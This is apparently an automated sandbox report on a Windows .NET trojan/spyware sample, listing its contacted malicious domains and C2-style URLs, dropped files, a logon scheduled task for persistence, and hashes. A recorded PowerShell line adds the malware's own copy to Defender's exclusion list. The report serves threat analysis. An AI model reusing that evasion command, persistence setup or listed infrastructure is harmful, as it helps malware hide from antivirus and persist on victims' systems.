http://www.carterandcone.com	iuvRyl9i7D.exe, 00000000.00000003.247847880.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248188896.0000000005F04000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248440340.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248784254.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249091958.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247682105.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn)	iuvRyl9i7D.exe, 00000000.00000003.247623435.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247629329.0000000005F31000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591LMEM(	control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.typography.netD	iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/intl/en_uk/chrome/LMEMx	control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
38.34.163.59	a6.pingcache.com	United States	174	COGENT-174US	true
35.209.127.155	www.jamesreadtanusa.com	United States	19527	GOOGLE-2US	true
5.183.8.183	www.dems-clicks.com	Germany	64463	INTERXSCH	true
35.241.47.216	www.bldh45.xyz	United States	15169	GOOGLEUS	false
198.54.116.236	properscooter.com	United States	22612	NAMECHEAP-NETUS	true
198.54.117.216	parkingpage.namecheap.com	United States	22612	NAMECHEAP-NETUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	626605
Start date and time: 14/05/202215:27:31	2022-05-14 15:27:31 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	iuvRyl9i7D (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@15/9@7/6
EGA Information:	Successful, ratio: 75%
HDC Information:	Successful, ratio: 18.3% (good quality ratio 16.5%) Quality average: 70.5% Quality standard deviation: 32.2%
HCA Information:	Successful, ratio: 96% Number of executed functions: 115 Number of non-executed functions: 146
Cookbook Comments:	Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 20.223.24.244
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
Execution Graph export aborted for target iuvRyl9i7D.exe, PID 6804 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:28:48	API Interceptor	1x Sleep call for process: iuvRyl9i7D.exe modified
15:28:56	API Interceptor	40x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
38.34.163.59	PRO.INV.xlsx	Get hash	malicious	Browse	www.uspplongee.com/n6g4/?g8it=2dwXw8MPNFJH9&j4=YEAzGNAwBniUpywKKmtX9JznxcWz/G0oG2So/zeJzf8A8dVj5v82izgbM4vCaTU8AqcLEw==
5.183.8.183	PROFORMA INVOICE.xlsx	Get hash	malicious	Browse	www.dems-clicks.com/n6g4/?Rju=oW3KVVYfOUtMWnx9E4fO+4eOl+SZoa0wNCifvEB8Y9jnCg3EyPPrm8173PHAA8seoyylQg==&ohA=4hdXYFAH
	NEW ORDER LIST JUNE 2022.xlsx	Get hash	malicious	Browse	www.dems-clicks.com/n6g4/?bJEdePb=oW3KVVYfOUtMWnx9E4fO+4eOl+SZoa0wNCifvEB8Y9jnCg3EyPPrm8173PHAA8seoyylQg==&z4wh1=K2JhQ8u0d8xdq0
	v444BZjqsC.exe	Get hash	malicious	Browse	www.dems-clicks.com/n6g4/?j2=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qrWEsotjxvV&6lpt=1bzlovchh8
	PRO.INV.xlsx	Get hash	malicious	Browse	www.dems-clicks.com/n6g4/?g8it=2dwXw8MPNFJH9&j4=oW3KVVYfOUtMWnx9E4fO+4eOl+SZoa0wNCifvEB8Y9jnCg3EyPPrm8173PHAA8seoyylQg==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
a6.pingcache.com	PRO.INV.xlsx	Get hash	malicious	Browse	38.34.163.59
vip.myshopline.shop	ANFRAGEN _21042022.docx	Get hash	malicious	Browse	104.17.233.29
	TNT Receipt_TNTMX988653000.exe	Get hash	malicious	Browse	104.17.232.29
	Payment Advice for Outstanding Invoices.exe	Get hash	malicious	Browse	104.17.233.29
	RFQ Ref. No. MS-DGP-220137.exe	Get hash	malicious	Browse	104.17.232.29
	NEW INQUIRY ORDER IN USD.exe	Get hash	malicious	Browse	104.17.232.29
	2022 Project Proposal.xlsx	Get hash	malicious	Browse	104.17.233.29
	7Gvxve2nGj.exe	Get hash	malicious	Browse	104.17.232.29
	NBC-INV-099834.exe	Get hash	malicious	Browse	104.17.233.29
	DwpdX4dJzg.exe	Get hash	malicious	Browse	104.17.232.29
parkingpage.namecheap.com	DL03327INV.xlsx	Get hash	malicious	Browse	198.54.117.212
	inlaww321345.exe	Get hash	malicious	Browse	198.54.117.212
	Notificaci#U00f3n de pago.exe	Get hash	malicious	Browse	198.54.117.212
	Advice FTT5378393.exe	Get hash	malicious	Browse	198.54.117.211
	Reference Note PJS-4010036-Ref 18976.exe	Get hash	malicious	Browse	198.54.117.211
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Browse	198.54.117.215
	SecuriteInfo.com.Variant.Jaik.72878.8629.exe	Get hash	malicious	Browse	198.54.117.217
	ORDERS_S.EXE	Get hash	malicious	Browse	198.54.117.217
	EMIRATE BANK SWIFT 12-05-2022.exe	Get hash	malicious	Browse	198.54.117.210
	RewdsccVjn.exe	Get hash	malicious	Browse	198.54.117.218
	2YoK0uIVmS.exe	Get hash	malicious	Browse	198.54.117.218
	Energe 1,010.00.xlsx	Get hash	malicious	Browse	198.54.117.218
	DHL Shipment doc.exe	Get hash	malicious	Browse	198.54.117.212
	v444BZjqsC.exe	Get hash	malicious	Browse	198.54.117.210
	jO7HOv839n.exe	Get hash	malicious	Browse	198.54.117.215
	TyTasyWsK7.exe	Get hash	malicious	Browse	198.54.117.212
	Comanda atasata.exe	Get hash	malicious	Browse	198.54.117.215
	Enquiry 1331 SO 26929.exe	Get hash	malicious	Browse	198.54.117.217
	ST10501909262401.exe	Get hash	malicious	Browse	198.54.117.210
	bWFqrKmWuG.exe	Get hash	malicious	Browse	198.54.117.212
www.dems-clicks.com	PROFORMA INVOICE.xlsx	Get hash	malicious	Browse	5.183.8.183
	NEW ORDER LIST JUNE 2022.xlsx	Get hash	malicious	Browse	5.183.8.183
	v444BZjqsC.exe	Get hash	malicious	Browse	5.183.8.183
	PRO.INV.xlsx	Get hash	malicious	Browse	5.183.8.183

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
COGENT-174US	63CYVWIouB	Get hash	malicious	Browse	38.253.112.215
	SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.17738.exe	Get hash	malicious	Browse	154.53.50.251
	IsQzUGbu7m	Get hash	malicious	Browse	38.83.59.55
	sora.arm	Get hash	malicious	Browse	154.28.148.110
	csqe8VS0YI	Get hash	malicious	Browse	199.98.250.182
	0vFX7VXc9U	Get hash	malicious	Browse	38.162.241.46
	INVOICE03800838-93U8REMIT903904989304.HTML	Get hash	malicious	Browse	38.34.185.163
	aqua.arm7	Get hash	malicious	Browse	204.157.10.218
	W5hSKgNsxl	Get hash	malicious	Browse	38.13.111.186
	ZG9zarm7	Get hash	malicious	Browse	38.60.24.238
	ZG9zx86	Get hash	malicious	Browse	38.181.75.90
	ZG9zarm	Get hash	malicious	Browse	38.248.71.197
	UR0w9ZKXQ2	Get hash	malicious	Browse	154.23.6.253
	dEQ1kYJPQH	Get hash	malicious	Browse	38.11.54.139
	sora.x86	Get hash	malicious	Browse	38.53.187.4
	vGS5FlwPDP	Get hash	malicious	Browse	199.97.148.43
	BqGb82HXOA	Get hash	malicious	Browse	206.234.73.128
	lo8X4VmYlO	Get hash	malicious	Browse	38.59.110.232
	eBXJJbkzEB	Get hash	malicious	Browse	38.10.75.111
	INV_660100.xlsx	Get hash	malicious	Browse	38.34.185.163
GOOGLE-2US	Pp9F85FXto	Get hash	malicious	Browse	35.210.41.76
	x86	Get hash	malicious	Browse	35.209.64.52
	u2AMHyzwyn	Get hash	malicious	Browse	35.212.187.200
	1grimqPMrH	Get hash	malicious	Browse	35.207.178.9
	sora.arm7	Get hash	malicious	Browse	35.218.52.148
	pQ5y6C8rBz.exe	Get hash	malicious	Browse	35.208.117.72
	z3hir.arm7	Get hash	malicious	Browse	35.208.37.8
	doc8393983_884748399383764.pdf.vbs	Get hash	malicious	Browse	35.209.145.68
	8IkIEWQZ2I	Get hash	malicious	Browse	35.208.205.143
	sora.arm	Get hash	malicious	Browse	35.214.251.56
	nBUq7W3iLz	Get hash	malicious	Browse	35.210.89.17
	mangoola_coal_enterprise_agreement 35417.js	Get hash	malicious	Browse	35.214.98.105
	a4KSkrzwqB	Get hash	malicious	Browse	35.216.219.225
	0R5Oebxp3l	Get hash	malicious	Browse	35.210.89.57
	9KfEymofCW	Get hash	malicious	Browse	35.216.219.219
	5uXedo3UfM	Get hash	malicious	Browse	34.114.178.231
	4x2WhLFL1j	Get hash	malicious	Browse	35.210.41.84
	sora.arm	Get hash	malicious	Browse	35.210.16.84
	DJowS0XtNv	Get hash	malicious	Browse	34.114.178.253
	vbc.exe	Get hash	malicious	Browse	35.214.82.1
INTERXSCH	PROFORMA INVOICE.xlsx	Get hash	malicious	Browse	5.183.8.183
	NEW ORDER LIST JUNE 2022.xlsx	Get hash	malicious	Browse	5.183.8.183
	v444BZjqsC.exe	Get hash	malicious	Browse	5.183.8.183
	Payment confirmation reference.exe	Get hash	malicious	Browse	5.183.8.187
	PRO.INV.xlsx	Get hash	malicious	Browse	5.183.8.183
	SecuriteInfo.com.Trojan.Siggen17.48628.31246.exe	Get hash	malicious	Browse	5.183.8.28

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\iuvRyl9i7D.exe.log

Download File

Process:	C:\Users\user\Desktop\iuvRyl9i7D.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1308
Entropy (8bit):	5.345811588615766
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4FsXE8:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHJ
MD5:	EA78C102145ED608EF0E407B978AF339
SHA1:	66C9179ED9675B9271A97AB1FC878077E09AB731
SHA-256:	8BF01E0C445BD07C0B4EDC7199B7E17DAF1CA55CA52D4A6EAC4EF211C2B1A73E
SHA-512:	8C04139A1FC3C3BDACB680EC443615A43EB18E73B5A0CFCA644CB4A5E71746B275B3E238DD1A5A205405313E457BB75F9BBB93277C67AFA5D78DCFA30E5DA02B
Malicious:	true
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	22204
Entropy (8bit):	5.600460279727319
Encrypted:	false
SSDEEP:	384:ktCDaDXEOrmS6mqBXDbFRYSgQjultI8M7nvng3hInYML+CfmAV7QWdy5ZQvnI++R:eo9B/IUCltPo66DK2ps+8
MD5:	B37685386C11149B349B3D36F3272C90
SHA1:	0226975575203F0CD37C354F3AD0E487282B1D43
SHA-256:	28D1714B9C88A5CC6E75003C38FA50BAC871340F109EFAB722EC00F1366A0C34
SHA-512:	CFA1829AF78BD7FD8E3997B0A48542B87F6159E587208F9ADC628BB382CFFC9CA58E98B01C9DD004A88F0C2E26D393E20EA6B0AC0E353D1078D0A6C6B9D6FD83
Malicious:	false
Reputation:	unknown
Preview:	@...e...........g.......K.............M.../..........@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\DB1

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21wlmt0u.5nd.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ekjb5no.0s4.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\tmp280F.tmp

Download File

Process:	C:\Users\user\Desktop\iuvRyl9i7D.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1598
Entropy (8bit):	5.1439090161906
Encrypted:	false
SSDEEP:	24:2di4+S2qh/S1KTy1moCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaX5xvn:cgeKwYrFdOFzOzN33ODOiDdKrsuTivv
MD5:	BB9A391C3FC862B873BE57126F43023A
SHA1:	7C8FCB74AB71109806F8DC898205988205AC599C
SHA-256:	BC7496050B45F9AFEAC4A3197FEB044287FFBA3FCF2627DB958FE701CC8C0AF3
SHA-512:	09E37C24F320D92D652072FB744CFAF46C113D65E179D4A14296D56729815D7CCB4EE71AF94801CE51D681C81C8C5DCE1750CC850ED421814FE3893651EFF2DF
Malicious:	true
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <

C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe

Download File

Process:	C:\Users\user\Desktop\iuvRyl9i7D.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	731648
Entropy (8bit):	7.625561793309267
Encrypted:	false
SSDEEP:	12288:WQ4QvzJDpg1Hu8jdWmNPNZ0Lwrftg3znNWTTgbSbRdpGReKfgOz6:/4Qvl1g1OC90Mrfm3zncTTRRiZgR
MD5:	F7ECD12D134AAF3541396C78337CE672
SHA1:	BB41A84D4F5EEF537E41CF4BDE375C99BFF86A04
SHA-256:	EC2F5710FDF33C7B843829EBD9F088B15141B643B4354DD92D39B6E290CECA70
SHA-512:	EF70EB852B370E5F29CA4D27584A3FAAD34A629C857E135F434B21E483C24FC813FE97FFF77EB73DAE428FD3E97FB82C3564EAE03A18D8BFD0F1A71BA3C9F77A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 20%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Og.b..............0.. ...........?... ...@....@.. ....................................@..................................>..O....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B.................>......H............G...............=..........................................&.(......F.(........(.......(..........(..........(........{...."..}....&.(......F.(........(.......(..........(..........(........0...........(.....o......o.....+...0...........(.....o......o.....+...0...........(.....o.......o.....+......0...........(.....o.......o.....+......0.. ........(.....o.......o......o$....+...0.. ........(.....o.......o......o$....+...(....o.....(....o....

C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\iuvRyl9i7D.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Documents\20220514\PowerShell_transcript.305090.7Vik_2vb.20220514152854.txt

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5793
Entropy (8bit):	5.4054745940790925
Encrypted:	false
SSDEEP:	96:BZQAjfN/qDo1Z5ZxjfN/qDo1Zm7xjjZ8jfN/qDo1ZiWzzNZa:0t
MD5:	73CEC78D744EB0750820765761E7ACC7
SHA1:	5F2D5D6A88E3DB9FE65F51DE6C6DE7089A6CE639
SHA-256:	F7C865F08C0D6F50B6E194B0B533B58BA793FE0F2DAD8758089E3DA2FCF02E5B
SHA-512:	94DBB6640B4214CD07FB7D8CDF0E3A34F9C92CCD6721E7BE6268A3152027581BB6150C0BCEF6EB2D3E76E427A1DDDDF33C66E8600517646BB8529CE268127B7B
Malicious:	false
Reputation:	unknown
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220514152856..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 305090 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe..Process ID: 6568..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220514152856..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe..********************..Windows PowerShell transcript start..Start time: 20220514153248..Username: computer\user..RunAs User: computer\jo

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.625561793309267
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	iuvRyl9i7D.exe
File size:	731648
MD5:	f7ecd12d134aaf3541396c78337ce672
SHA1:	bb41a84d4f5eef537e41cf4bde375c99bff86a04
SHA256:	ec2f5710fdf33c7b843829ebd9f088b15141b643b4354dd92d39b6e290ceca70
SHA512:	ef70eb852b370e5f29ca4d27584a3faad34a629c857e135f434b21e483c24fc813fe97fff77eb73dae428fd3e97fb82c3564eae03a18d8bfd0f1a71ba3c9f77a
SSDEEP:	12288:WQ4QvzJDpg1Hu8jdWmNPNZ0Lwrftg3znNWTTgbSbRdpGReKfgOz6:/4Qvl1g1OC90Mrfm3zncTTRRiZgR
TLSH:	80F4E05133FC5F09D27AE3F99670115087B57A3A59AAE38E0CC130EE1EA1F409752B67
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Og.b..............0.. ...........?... ...@....@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x4b3f0a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x627F674F [Sat May 14 08:24:47 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb3eb8	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb4000	0x5c4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
